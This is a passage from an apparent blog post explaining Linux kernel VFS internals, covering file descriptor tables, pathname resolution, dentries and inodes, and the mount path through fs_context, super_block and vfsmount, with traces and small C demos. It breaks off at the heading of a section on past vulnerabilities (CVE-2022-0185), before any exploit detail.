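    return -1; /* table full in this model */
}

/* Like fd_install(): publish the file object under a reserved number. */
static void model_fd_install(struct model_fdtable *fdt, int fd,
                             struct model_file *file)
{
    fdt->fd[fd] = file;
}

/* Like fdget(): translate a number back into the file object. */
static struct model_file *model_fdget(const struct model_fdtable *fdt, int fd)
{
    if (fd < 0 || fd >= MODEL_MAX_FDS || !(fdt->open_fds & (1ULL << fd)))
        return NULL;
    return fdt->fd[fd];
}
```

<p>Splitting reservation from installation mirrors the order in <code class="language-plaintext highlighter-rouge">do_sys_openat2()</code>: the number is claimed first, and the <code class="language-plaintext highlighter-rouge">file</code> object only becomes reachable once it has been opened.</p>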

<p><br /></p>

<p>The next question is <strong>“How does the kernel resolve a pathname?”</strong></p>

<p>There are three steps: setting up the resolution environment, resolving the directory, and resolving the final file. These steps correspond to three different function calls, which we saw in <code class="language-plaintext highlighter-rouge">path_openat()</code>.</p>

<p><code class="language-plaintext highlighter-rouge">path_init()</code> is called first to set up the resolution environment. Basically, it decides the <strong>starting directory</strong>, since the <code class="language-plaintext highlighter-rouge">open</code> syscall allows a process to resolve a pathname from a specified directory.</p>

<p>If the pathname starts with <code class="language-plaintext highlighter-rouge">"/"</code>, the kernel sets the starting directory to the <strong>root directory</strong>. Otherwise, the kernel checks the <strong>directory file descriptor</strong> (<code class="language-plaintext highlighter-rouge">dfd</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>path_init(nd, flags)
=&gt; s = nd-&gt;pathname
=&gt; if (*s == '/' &amp;&amp; ...)
  =&gt; nd_jump_root(nd)
    =&gt; set_root(nd)
      =&gt; fs = current-&gt;fs
      =&gt; nd-&gt;root = fs-&gt;root
    =&gt; nd-&gt;path = nd-&gt;root
    =&gt; nd-&gt;inode = nd-&gt;path.dentry-&gt;d_inode

=&gt; if (nd-&gt;dfd == AT_FDCWD)
  =&gt; fs = current-&gt;fs
  =&gt; nd-&gt;path = fs-&gt;pwd
  =&gt; nd-&gt;inode = nd-&gt;path.dentry-&gt;d_inode

=&gt; else
  =&gt; f = fdget_raw(nd-&gt;dfd)
  =&gt; nd-&gt;path = fd_file(f)-&gt;f_path
  =&gt; nd-&gt;inode = nd-&gt;path.dentry-&gt;d_inode
</code></pre></div></div>

<p>You might already notice the similarity. Although the operations differ, the goal is the same: set <strong><code class="language-plaintext highlighter-rouge">nd-&gt;path</code></strong> and <strong><code class="language-plaintext highlighter-rouge">nd-&gt;inode</code></strong>. Moreover, if you look more carefully, you may notice that <code class="language-plaintext highlighter-rouge">nd-&gt;inode</code> actually comes from a field inside <code class="language-plaintext highlighter-rouge">nd-&gt;path</code>. The <code class="language-plaintext highlighter-rouge">nd-&gt;path</code> is a <code class="language-plaintext highlighter-rouge">path</code> object consisting of <code class="language-plaintext highlighter-rouge">mnt</code> and <code class="language-plaintext highlighter-rouge">dentry</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">path</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">vfsmount</span> <span class="o">*</span><span class="n">mnt</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">dentry</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>With <code class="language-plaintext highlighter-rouge">nd-&gt;path</code> set to the starting directory, we move to the next step to resolve the <strong>directory part</strong> of the pathname.</p>

<p>Generally, <code class="language-plaintext highlighter-rouge">link_path_walk()</code> separates the whole pathname into components <strong>using one or more <code class="language-plaintext highlighter-rouge">"/"</code> as the delimiter</strong> and resolves them one at a time. For example, the pathname <code class="language-plaintext highlighter-rouge">"a/b///c/d"</code> will be separated into <code class="language-plaintext highlighter-rouge">"a"</code>, <code class="language-plaintext highlighter-rouge">"b"</code>, <code class="language-plaintext highlighter-rouge">"c"</code> and <code class="language-plaintext highlighter-rouge">"d"</code>.</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">__d_lookup_rcu()</code> finds the corresponding <strong><code class="language-plaintext highlighter-rouge">dentry</code></strong> object for the current component based on the current directory (<code class="language-plaintext highlighter-rouge">parent</code>) and name string (<code class="language-plaintext highlighter-rouge">&amp;nd-&gt;last</code>). Interestingly, all <code class="language-plaintext highlighter-rouge">dentry</code> objects are stored in bucket lists that can be referenced from a <strong>global</strong> hash table (<code class="language-plaintext highlighter-rouge">dentry_hashtable</code>).</p>

<p>After successfully obtaining the <code class="language-plaintext highlighter-rouge">dentry</code> object, <code class="language-plaintext highlighter-rouge">step_into()</code> is called to <strong>update the current directory to the found <code class="language-plaintext highlighter-rouge">dentry</code> object</strong>. This function also handles the symlink resolution, but we will not discuss it further here.</p>

<p>The entire process may repeat several times until it reaches the final component.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>link_path_walk(name, nd)
=&gt; for each component
  =&gt; nd-&gt;last.name = name
  =&gt; link = walk_component(nd, WALK_MORE)
    
    =&gt; dentry = lookup_fast(nd)
      =&gt; parent = nd-&gt;path.dentry
      =&gt; dentry = __d_lookup_rcu(parent, &amp;nd-&gt;last, &amp;nd-&gt;next_seq)
        =&gt; b = d_hash(hashlen)
          =&gt; dentry_hashtable + hash value
    
    =&gt; step_into(nd, flags, dentry)
      =&gt; handle_mounts(nd, dentry, &amp;path)
        =&gt; path-&gt;mnt = nd-&gt;path.mnt
        =&gt; path-&gt;dentry = dentry
      =&gt; nd-&gt;path = path
      =&gt; nd-&gt;inode = path.dentry-&gt;d_inode
</code></pre></div></div>
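<p>The component splitting described for <code class="language-plaintext highlighter-rouge">link_path_walk()</code> can be sketched in user space as a small iterator. This models only the string handling (runs of <code class="language-plaintext highlighter-rouge">"/"</code> count as one delimiter), not the dentry lookup. <code class="language-plaintext highlighter-rouge">model_next_component()</code> and the name-length limit are assumptions for the example.</p>

```c
#include <stddef.h>
#include <string.h>

#define MODEL_MAX_NAME 256

/*
 * Copy the next component of *path into out and advance *path past it.
 * Returns 1 if a component was produced, 0 at the end of the pathname.
 */
static int model_next_component(const char **path, char out[MODEL_MAX_NAME])
{
    const char *p = *path;
    size_t full, len;

    while (*p == '/') /* skip one or more delimiters */
        p++;
    if (*p == '\0') {
        *path = p;
        return 0;
    }

    full = strcspn(p, "/"); /* length up to the next '/' or the end */
    len = full < MODEL_MAX_NAME ? full : MODEL_MAX_NAME - 1;
    memcpy(out, p, len);    /* overly long names are truncated in this model */
    out[len] = '\0';

    *path = p + full;
    return 1;
}
```

<p>Calling it repeatedly on <code class="language-plaintext highlighter-rouge">"a/b///c/d"</code> produces the four components from the example and then reports the end of the pathname.</p>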

<p>Finally, <code class="language-plaintext highlighter-rouge">open_last_lookups()</code> is called to <strong>resolve the final component</strong> (the file itself). This function is basically the same as <code class="language-plaintext highlighter-rouge">walk_component()</code> if the file already exists. However, the main difference is that <code class="language-plaintext highlighter-rouge">walk_component()</code> returns an error if <code class="language-plaintext highlighter-rouge">dentry</code> doesn’t exist, while <code class="language-plaintext highlighter-rouge">open_last_lookups()</code> <strong>creates a new <code class="language-plaintext highlighter-rouge">dentry</code> by <code class="language-plaintext highlighter-rouge">__d_alloc()</code></strong>.</p>

<p>This kind of <code class="language-plaintext highlighter-rouge">dentry</code> is called a <strong>negative dentry</strong>, meaning the <code class="language-plaintext highlighter-rouge">dentry</code> has no associated <code class="language-plaintext highlighter-rouge">inode</code> (i.e., no actual file on disk), but it still exists in the dcache and can be accessed. It is required because a process can pass the <code class="language-plaintext highlighter-rouge">O_CREAT</code> option to create the file if it doesn’t exist yet.</p>

<p>Later, the kernel calls the inode operation <code class="language-plaintext highlighter-rouge">.create</code> to create an <strong><code class="language-plaintext highlighter-rouge">inode</code></strong> and bind it to that <code class="language-plaintext highlighter-rouge">dentry</code>. How the kernel creates the <code class="language-plaintext highlighter-rouge">inode</code> depends on the filesystem. For instance, the shmem filesystem calls <code class="language-plaintext highlighter-rouge">shmem_get_inode()</code> to allocate a shmem inode.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>open_last_lookups(nd, file, op)
=&gt; dentry = lookup_fast_for_open(nd, open_flag)
  =&gt; dentry = lookup_fast(nd)
  =&gt; return dentry

=&gt; if not found
  =&gt; dentry = lookup_open(nd, file, op, got_write)
    =&gt; dentry = d_lookup(dir, &amp;nd-&gt;last)
    =&gt; dentry = d_alloc_parallel(dir, &amp;nd-&gt;last, &amp;wq)
      =&gt; new = __d_alloc(parent-&gt;d_sb, name)
        =&gt; dentry = kmem_cache_alloc_lru(dentry_cache)
        =&gt; dentry-&gt;d_op = sb-&gt;__s_d_op
      =&gt; return new
    
    =&gt; dir_inode-&gt;i_op-&gt;create(idmap, dir_inode, dentry)
      =&gt; inode = ...
      =&gt; d_instantiate(dentry, inode)
        =&gt; __d_set_inode_and_type(dentry, inode, add_flags)
          =&gt; dentry-&gt;d_inode = inode

=&gt; step_into(nd, WALK_TRAILING, dentry)
</code></pre></div></div>
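<p>From userspace, the difference between a failed lookup and a create-on-open is visible through <code class="language-plaintext highlighter-rouge">open()</code> alone. The sketch below uses only standard POSIX calls; <code class="language-plaintext highlighter-rouge">demo_o_creat()</code> is a hypothetical helper name. Which kernel path each call takes is my reading of the trace above and is not something the program itself verifies.</p>

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/*
 * Hypothetical helper: returns 0 if open() behaves as described above,
 * -1 otherwise. `path` must be a location the caller may create and
 * delete; any existing file at `path` is removed.
 */
int demo_o_creat(const char *path)
{
    int fd;

    unlink(path);                       /* make sure the file is absent */

    /* Without O_CREAT, the last component is not found: ENOENT. */
    fd = open(path, O_RDONLY);
    if (fd != -1) {
        close(fd);
        return -1;
    }
    if (errno != ENOENT)
        return -1;

    /* With O_CREAT, the filesystem is asked to create an inode. */
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd == -1)
        return -1;
    close(fd);

    /* Now the same lookup succeeds because the dentry has an inode. */
    fd = open(path, O_RDONLY);
    if (fd == -1)
        return -1;
    close(fd);

    unlink(path);                       /* clean up */
    return 0;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">demo_o_creat()</code> with a scratch path under a writable directory is enough to observe the behaviour.</p>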

<p>By now, we know that pathname resolution is essentially a series of <code class="language-plaintext highlighter-rouge">dentry</code> lookups. It starts by setting the starting directory, separating the pathname into components, and then retrieving the corresponding <code class="language-plaintext highlighter-rouge">dentry</code> for each component from the hash bucket list.</p>

<p><br /></p>

<p>The last question, <strong>“How does the binding work?”</strong>, is related to how a file accesses metadata such as permissions. Internally, <code class="language-plaintext highlighter-rouge">vfs_open()</code> stores the path information for future lookups (<code class="language-plaintext highlighter-rouge">file-&gt;__f_path</code>), and <code class="language-plaintext highlighter-rouge">do_dentry_open()</code> is then called to store the <code class="language-plaintext highlighter-rouge">inode</code> (<code class="language-plaintext highlighter-rouge">f-&gt;f_inode</code>) and invoke the filesystem’s open handler (<code class="language-plaintext highlighter-rouge">f-&gt;f_op-&gt;open</code>). That’s how the <code class="language-plaintext highlighter-rouge">file</code> object is associated with the <code class="language-plaintext highlighter-rouge">dentry</code> and the <code class="language-plaintext highlighter-rouge">inode</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_open(nd, file, op)
=&gt; vfs_open(&amp;nd-&gt;path, file)
  =&gt; file-&gt;__f_path = *path
  =&gt; do_dentry_open(file, NULL)
    =&gt; inode = f-&gt;f_path.dentry-&gt;d_inode
    =&gt; f-&gt;f_inode = inode
    =&gt; f-&gt;f_op = fops_get(inode-&gt;i_fop)
    =&gt; f-&gt;f_op-&gt;open(inode, f)
</code></pre></div></div>

<p>In short, the relationships among the file descriptor, <code class="language-plaintext highlighter-rouge">file</code>, <code class="language-plaintext highlighter-rouge">dentry</code>, <code class="language-plaintext highlighter-rouge">path</code> and <code class="language-plaintext highlighter-rouge">inode</code> are as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    [fdtable]         (__f_path)
fd --&gt; [0] -&gt; file A ------------&gt; path
                   |                |-- mnt
         (f_inode) |                |-- dentry --
                   |                             |
                    ------&gt; inode &lt;--------------
                                     (d_inode)
       [1] -&gt; file B
       [X] -&gt; ......
</code></pre></div></div>

<p>They each have different roles: a <strong>file descriptor</strong> is a number used to index the file descriptor table; a <strong><code class="language-plaintext highlighter-rouge">file</code></strong> encapsulates regular files and sockets under the same interface for a clean and simple design; a <strong><code class="language-plaintext highlighter-rouge">path</code></strong> is used for lookup and contains the mount object (<code class="language-plaintext highlighter-rouge">mnt</code>) and the <code class="language-plaintext highlighter-rouge">dentry</code>; a <strong><code class="language-plaintext highlighter-rouge">dentry</code></strong> contains pathname information for file lookup; an <strong><code class="language-plaintext highlighter-rouge">inode</code></strong> contains the file’s metadata, including the owner, permissions, and file mapping information.</p>
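<p>The split between file descriptor, <code class="language-plaintext highlighter-rouge">file</code> and <code class="language-plaintext highlighter-rouge">inode</code> can be observed from userspace. In the sketch below, <code class="language-plaintext highlighter-rouge">run_fd_demo()</code> and <code class="language-plaintext highlighter-rouge">struct fd_demo_result</code> are hypothetical names. It relies on two documented POSIX behaviours: descriptors created by <code class="language-plaintext highlighter-rouge">dup()</code> share one file offset, while a second <code class="language-plaintext highlighter-rouge">open()</code> of the same path gets its own offset but reports the same inode number.</p>

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

struct fd_demo_result {
    long dup_offset;   /* offset seen through the dup()ed descriptor   */
    long open_offset;  /* offset seen through the second open()        */
    int  same_inode;   /* 1 if both opens refer to the same inode      */
};

/*
 * Hypothetical helper: creates (and finally removes) a scratch file at
 * `path`. Returns 0 on success and fills `res`, -1 on any error.
 */
int run_fd_demo(const char *path, struct fd_demo_result *res)
{
    struct stat st_a, st_c;
    int ret = -1;
    int a = open(path, O_RDWR | O_CREAT | O_TRUNC, 0600);
    int b = (a >= 0) ? dup(a) : -1;     /* second fd, same `file`       */
    int c = open(path, O_RDONLY);       /* new `file`, same inode       */

    if (a < 0 || b < 0 || c < 0)
        goto done;
    if (write(a, "hello", 5) != 5)      /* advances the shared offset   */
        goto done;
    if (fstat(a, &st_a) != 0 || fstat(c, &st_c) != 0)
        goto done;

    res->dup_offset  = (long)lseek(b, 0, SEEK_CUR);
    res->open_offset = (long)lseek(c, 0, SEEK_CUR);
    res->same_inode  = st_a.st_dev == st_c.st_dev &&
                       st_a.st_ino == st_c.st_ino;
    ret = 0;

done:
    if (a >= 0) close(a);
    if (b >= 0) close(b);
    if (c >= 0) close(c);
    unlink(path);
    return ret;
}
```

<p>After the 5-byte write, the duplicated descriptor reports offset 5 because it shares the <code class="language-plaintext highlighter-rouge">file</code> object, the independently opened descriptor still reports offset 0, and both resolve to the same <code class="language-plaintext highlighter-rouge">inode</code>.</p>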

<h2 id="12-fs_context-super_block-and-vfsmount">1.2. fs_context, super_block and vfsmount</h2>

<p>After introducing the concepts of <code class="language-plaintext highlighter-rouge">inode</code> and <code class="language-plaintext highlighter-rouge">dentry</code>, we may wonder <strong>where the <code class="language-plaintext highlighter-rouge">inode</code> comes from</strong> and <strong>how the mounting operation initializes <code class="language-plaintext highlighter-rouge">mnt</code> and builds the <code class="language-plaintext highlighter-rouge">inode</code> tree</strong>. In this section, we will explore these questions and find the answers.</p>

<p>Looking at the syscall <code class="language-plaintext highlighter-rouge">mount</code>, <code class="language-plaintext highlighter-rouge">do_new_mount()</code> calls <code class="language-plaintext highlighter-rouge">get_fs_type()</code> to find the <code class="language-plaintext highlighter-rouge">file_system_type</code> object with the matching name. The object contains metadata for creating a filesystem instance, and different filesystems may have their own implementations.</p>

<p>The <code class="language-plaintext highlighter-rouge">file_system_type</code> object is later used to initialize a filesystem context (<code class="language-plaintext highlighter-rouge">fc</code>) object by invoking its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler. A filesystem context represents an <strong>in-progress mount operation</strong> and stores configuration before the superblock is created. The <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler typically allocates and initializes <strong>filesystem-specific private data</strong> and sets up the <strong>context operations (<code class="language-plaintext highlighter-rouge">fc-&gt;ops</code>)</strong>.</p>

<p>After that, <code class="language-plaintext highlighter-rouge">parse_monolithic_mount_data()</code> is called to <strong>parse the mount parameters</strong>. For example, if you run the <code class="language-plaintext highlighter-rouge">mount</code> command with the options <code class="language-plaintext highlighter-rouge">-o ro,noexec</code>, the string <code class="language-plaintext highlighter-rouge">"ro,noexec"</code> will be parsed and used to update the filesystem context.</p>

<p>Finally, <code class="language-plaintext highlighter-rouge">do_new_mount_fc()</code> is called to set up the superblock and mount point.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_mount(dev_name, dir_name, type, flags, data)
=&gt; do_mount(kernel_dev, dir_name, kernel_type, flags, options)
  =&gt; user_path_at(AT_FDCWD, dir_name, LOOKUP_FOLLOW, &amp;path)
  =&gt; path_mount(dev_name, &amp;path, type_page, flags, data_page)
    =&gt; do_new_mount(path, type_page, sb_flags, mnt_flags, dev_name, data_page)
      =&gt; type = get_fs_type(fstype)
        =&gt; fs = __get_fs_type(name, len)
        =&gt; return fs
      
      =&gt; fc = fs_context_for_mount(type, sb_flags)
        =&gt; alloc_fs_context(fs_type, NULL, sb_flags, 0, FS_CONTEXT_FOR_MOUNT)
          =&gt; fc = kzalloc(sizeof(struct fs_context))
          =&gt; fc-&gt;fs_type-&gt;init_fs_context(fc)

      =&gt; parse_monolithic_mount_data(fc, data)
        =&gt; if (fc-&gt;ops-&gt;parse_monolithic != NULL)
          =&gt; fc-&gt;ops-&gt;parse_monolithic(fc, data)
        =&gt; else
          =&gt; generic_parse_monolithic(fc, data)
      
      =&gt; do_new_mount_fc(fc, path, mnt_flags)
</code></pre></div></div>
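<p>The set of filesystem types that <code class="language-plaintext highlighter-rouge">get_fs_type()</code> can find without loading a module is exposed through <code class="language-plaintext highlighter-rouge">/proc/filesystems</code>. The following sketch reads that file; <code class="language-plaintext highlighter-rouge">fs_type_registered()</code> is a hypothetical helper name, and the code assumes procfs is mounted at <code class="language-plaintext highlighter-rouge">/proc</code>. Filesystems built as modules that are not loaded yet will not be listed, even though a real mount may still succeed after the module is loaded on demand.</p>

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical helper: returns 1 if `name` is listed in
 * /proc/filesystems, 0 if it is not, and -1 if the file cannot be
 * opened (for example, when procfs is not mounted).
 */
int fs_type_registered(const char *name)
{
    char line[256];
    int found = 0;
    FILE *fp = fopen("/proc/filesystems", "r");

    if (!fp)
        return -1;

    while (fgets(line, sizeof(line), fp)) {
        line[strcspn(line, "\n")] = '\0';   /* drop the trailing newline */

        /* Each line is "[nodev]<TAB><name>"; the name follows the tab. */
        const char *tab = strrchr(line, '\t');
        const char *fs = tab ? tab + 1 : line;

        if (strcmp(fs, name) == 0) {
            found = 1;
            break;
        }
    }

    fclose(fp);
    return found;
}
```

<p>On a typical Linux system, asking for <code class="language-plaintext highlighter-rouge">"ramfs"</code> or <code class="language-plaintext highlighter-rouge">"proc"</code> should report that the type is registered.</p>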

<p>Internally, the kernel calls the filesystem’s <code class="language-plaintext highlighter-rouge">.get_tree</code> handler to build the <strong>file tree</strong>. For filesystems that <strong>require a backing image</strong>, such as ext4, the handler initializes the superblock and sets up the root <code class="language-plaintext highlighter-rouge">inode</code> and root <code class="language-plaintext highlighter-rouge">dentry</code> based on on-disk metadata. Other <code class="language-plaintext highlighter-rouge">inode</code>s and <code class="language-plaintext highlighter-rouge">dentry</code>s are <strong>loaded on demand</strong> during path lookup rather than being created eagerly at mount time.</p>

<p>In contrast, for filesystems that <strong>do not require a backing image</strong>, such as ramfs, the handler typically allocates a new superblock and creates only the root <code class="language-plaintext highlighter-rouge">inode</code> and <code class="language-plaintext highlighter-rouge">dentry</code> for the mount point.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_new_mount_fc(fc, mountpoint, mnt_flags)
=&gt; mnt = fc_mount(fc)
  =&gt; vfs_get_tree(fc)
    =&gt; fc-&gt;ops-&gt;get_tree(fc)
  =&gt; vfs_create_mount(fc)
</code></pre></div></div>
<p>Let’s take ramfs as an example. Its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> sets the context operations to <code class="language-plaintext highlighter-rouge">&amp;ramfs_context_ops</code>, whose <code class="language-plaintext highlighter-rouge">.get_tree</code> handler is <code class="language-plaintext highlighter-rouge">ramfs_get_tree()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">ramfs_init_fs_context</span><span class="p">(</span><span class="k">struct</span> <span class="n">fs_context</span> <span class="o">*</span><span class="n">fc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="n">fc</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">ramfs_context_ops</span><span class="p">;</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">fs_context_operations</span> <span class="n">ramfs_context_ops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">free</span>        <span class="o">=</span> <span class="n">ramfs_free_fc</span><span class="p">,</span>
    <span class="p">.</span><span class="n">parse_param</span> <span class="o">=</span> <span class="n">ramfs_parse_param</span><span class="p">,</span>
    <span class="p">.</span><span class="n">get_tree</span>    <span class="o">=</span> <span class="n">ramfs_get_tree</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Almost all filesystems follow a pattern for their <code class="language-plaintext highlighter-rouge">.get_tree</code> handler. They commonly call <code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> or related functions, passing a filesystem-specific <code class="language-plaintext highlighter-rouge">fill_super</code> callback.</p>

<p><code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> internally obtains or creates a superblock and then invokes the provided callback to initialize it. In the case of ramfs, its <code class="language-plaintext highlighter-rouge">.get_tree</code> handler calls <code class="language-plaintext highlighter-rouge">get_tree_nodev()</code> with <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">ramfs_get_tree</span><span class="p">(</span><span class="k">struct</span> <span class="n">fs_context</span> <span class="o">*</span><span class="n">fc</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">get_tree_nodev</span><span class="p">(</span><span class="n">fc</span><span class="p">,</span> <span class="n">ramfs_fill_super</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If a new superblock is needed, <code class="language-plaintext highlighter-rouge">alloc_super()</code> is called to allocate a <code class="language-plaintext highlighter-rouge">super_block</code> object, and the newly created <code class="language-plaintext highlighter-rouge">super_block</code> object is then inserted into the <code class="language-plaintext highlighter-rouge">file_system_type</code>’s superblock linked list (<code class="language-plaintext highlighter-rouge">s-&gt;s_type-&gt;fs_supers</code>) by <code class="language-plaintext highlighter-rouge">sget_fc()</code>. After that, the <code class="language-plaintext highlighter-rouge">fill_super</code> callback (in this case, <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>) is invoked to initialize that <code class="language-plaintext highlighter-rouge">super_block</code> object.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>get_tree_nodev(fc, ramfs_fill_super)
=&gt; vfs_get_super(fc, NULL, fill_super)
  =&gt; sb = sget_fc(fc, test, set_anon_super_fc)
    =&gt; s = alloc_super(fc-&gt;fs_type, fc-&gt;sb_flags, user_ns)
    =&gt; hlist_add_head(&amp;s-&gt;s_instances, &amp;s-&gt;s_type-&gt;fs_supers)
  
  =&gt; fill_super(sb, fc)

=&gt; fc-&gt;root = dget(sb-&gt;s_root)
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">fill_super</code> callback must initialize the root <code class="language-plaintext highlighter-rouge">inode</code> and the root <code class="language-plaintext highlighter-rouge">dentry</code>, since the root <code class="language-plaintext highlighter-rouge">inode</code> contains the <strong>inode operations (<code class="language-plaintext highlighter-rouge">i_op</code>)</strong> and <strong>file operations (<code class="language-plaintext highlighter-rouge">i_fop</code>)</strong> required for directory lookup and file access.</p>

<p>In <code class="language-plaintext highlighter-rouge">ramfs_fill_super()</code>, <code class="language-plaintext highlighter-rouge">ramfs_get_inode()</code> is called to allocate and initialize the root <code class="language-plaintext highlighter-rouge">inode</code>. Then <code class="language-plaintext highlighter-rouge">d_make_root()</code> creates a <code class="language-plaintext highlighter-rouge">dentry</code> associated with that <code class="language-plaintext highlighter-rouge">inode</code>, and the returned <code class="language-plaintext highlighter-rouge">dentry</code> is assigned to the superblock’s root (<code class="language-plaintext highlighter-rouge">sb-&gt;s_root</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fill_super(sb, fc)   # ramfs_fill_super
=&gt; sb-&gt;s_op = &amp;ramfs_ops
=&gt; inode = ramfs_get_inode(sb, NULL, S_IFDIR | ..., 0)
  =&gt; inode = new_inode(sb)
    =&gt; alloc_inode(sb)
      =&gt; if sb-&gt;s_op-&gt;alloc_inode != NULL
        =&gt; inode = sb-&gt;s_op-&gt;alloc_inode(sb)
      =&gt; else
        =&gt; inode = alloc_inode_sb(sb)
  
  =&gt; if (mode == S_IFDIR)
    =&gt; inode-&gt;i_op = &amp;ramfs_dir_inode_operations
    =&gt; inode-&gt;i_fop = &amp;simple_dir_operations

=&gt; sb-&gt;s_root = d_make_root(inode)
</code></pre></div></div>

<p>At the end of the mounting process, <code class="language-plaintext highlighter-rouge">vfs_create_mount()</code> creates a <code class="language-plaintext highlighter-rouge">mount</code> object and associates it with the superblock by setting <code class="language-plaintext highlighter-rouge">m-&gt;mnt.mnt_sb</code> to point to the superblock (<code class="language-plaintext highlighter-rouge">root-&gt;d_sb</code>).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>vfs_create_mount(fc)
=&gt; mnt = alloc_vfsmnt(fc-&gt;source)
  =&gt; mnt = kmem_cache_zalloc(mnt_cache)

=&gt; setup_mnt(mnt, fc-&gt;root)
  =&gt; m-&gt;mnt.mnt_sb = root-&gt;d_sb
  =&gt; m-&gt;mnt.mnt_root = dget(root)
  =&gt; mnt_add_instance(m, s)
    =&gt; s-&gt;s_mounts = m

=&gt; return &amp;mnt-&gt;mnt
</code></pre></div></div>

<p>Since the filesystem context (<code class="language-plaintext highlighter-rouge">fs_context</code>) is only used during the mount setup phase, it is <strong>released</strong> before returning to userspace and is not referenced by any persistent VFS object.</p>

<p><br /></p>

<p>In summary, the filesystem name is used to look up the corresponding <strong><code class="language-plaintext highlighter-rouge">file_system_type</code></strong>, and its <code class="language-plaintext highlighter-rouge">.init_fs_context</code> handler is invoked to initialize a <strong>filesystem context</strong> (<code class="language-plaintext highlighter-rouge">fs_context</code>). Later, the kernel calls the filesystem’s <code class="language-plaintext highlighter-rouge">.get_tree</code> handler to build a file tree. Internally, a <strong><code class="language-plaintext highlighter-rouge">super_block</code></strong> object and a <strong><code class="language-plaintext highlighter-rouge">mount</code></strong> object are created, and the <strong>root <code class="language-plaintext highlighter-rouge">inode</code></strong> and the <strong>root <code class="language-plaintext highlighter-rouge">dentry</code></strong> are initialized by the filesystem’s <code class="language-plaintext highlighter-rouge">fill_super</code> callback.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>             [lookup]
name ("ramfs") ---&gt; file_system_type list ("bdev" &lt;--&gt; "aio" &lt;--&gt; "anon_inodefs" ...)
                          |
                          | [found]
                          v
                     ramfs_fs_type (.name == "ramfs")
                          |
                          | (fs_supers)
           (s_root)       |
dentry   &lt;---------  super_block --&gt; super_block --&gt; super_block --&gt; ...
|        &lt;--              |
|           |             | (s_mounts)
|(d_inode)  |             |
|            ---------  mount --&gt; mount --&gt; mount --&gt; ...
|          (mnt_root)           
v
inode
</code></pre></div></div>

<p>Awesome! Now we understand how a simple file descriptor can reference the actual file content and interact with the filesystem.</p>

<p>You may wonder why mount points and superblocks do not have a one-to-one relationship in the diagram. This is because when the mount flags include <code class="language-plaintext highlighter-rouge">MS_BIND</code>, the kernel invokes <code class="language-plaintext highlighter-rouge">__do_loopback()</code> instead of <code class="language-plaintext highlighter-rouge">do_new_mount()</code>. In this case, the process requests a new mount point based on an existing one. As a result, the kernel allocates a new <code class="language-plaintext highlighter-rouge">mount</code> object for the target path, but it <strong>shares the same underlying superblock as the original mount</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>path_mount(dev_name, path, type_page, flags, data_page)
=&gt; do_loopback(path, dev_name, flags &amp; MS_REC)
  =&gt; kern_path(old_name, LOOKUP_FOLLOW|LOOKUP_AUTOMOUNT, &amp;old_path)
  =&gt; __do_loopback(&amp;old_path, recurse)
    =&gt; clone_mnt(old, old_path-&gt;dentry, 0)
      =&gt; mnt = alloc_vfsmnt(old-&gt;mnt_devname)
      =&gt; setup_mnt(mnt, root)   &lt;-----   attach to existing superblock
</code></pre></div></div>

<h1 id="2-past-vulnerabilites">2. Past Vulnerabilities</h1>

<p>Here I chose two vulnerabilities that were exploited in kernelCTF in recent years to illustrate security issues in the filesystem.</p>

<h2 id="21-cve-2022-0185-vfs-fs_context-fix-up-param-length-parsing-in-legacy_parse_param">2.1. CVE-2022-0185: vfs: fs_context: fix up param length parsing in legacy_parse_param</h2>
<blockquote>
